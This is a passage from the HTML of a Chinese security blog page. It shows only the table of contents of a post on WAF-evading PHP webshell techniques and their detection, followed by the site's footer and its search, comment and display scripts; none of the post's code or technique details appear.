              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#常见绕过WAF的PHP-webshell"><span class="nav-number">1.</span> <span class="nav-text">常见绕过WAF的PHP webshell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#字符串变形"><span class="nav-number">1.1.</span> <span class="nav-text">字符串变形</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#自写函数"><span class="nav-number">1.2.</span> <span class="nav-text">自写函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#回调函数"><span class="nav-number">1.3.</span> <span class="nav-text">回调函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#类"><span class="nav-number">1.4.</span> <span class="nav-text">类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用外部文件"><span class="nav-number">1.5.</span> <span class="nav-text">利用外部文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#无字符特征马"><span class="nav-number">1.6.</span> <span class="nav-text">无字符特征马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#特殊请求头"><span class="nav-number">1.7.</span> <span class="nav-text">特殊请求头</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#全局变量"><span class="nav-number">1.8.</span> <span class="nav-text">全局变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP混淆加解密"><span class="nav-number">1.9.</span> <span class="nav-text">PHP混淆加解密</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP-webshell检测方法"><span class="nav-number">2.</span> <span class="nav-text">PHP webshell检测方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#实例展示"><span class="nav-number">2.1.</span> <span class="nav-text">实例展示</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单检测思路"><span class="nav-number">2.2.</span> <span class="nav-text">简单检测思路</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-linkedin"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">瓦都剋</span>
</div>



        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://mydisqus-2.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://byd.dropsec.xyz/2019/05/20/PHP常见过waf-webshell及最简单检测方法/';
          this.page.identifier = '2019/05/20/PHP常见过waf-webshell及最简单检测方法/';
          this.page.title = 'PHP常见过waf webshell及最简单检测方法';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://mydisqus-2.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  








  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

<script type="text/javascript" color="0,0,0" opacity='0.7' zIndex="-2" count="20" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
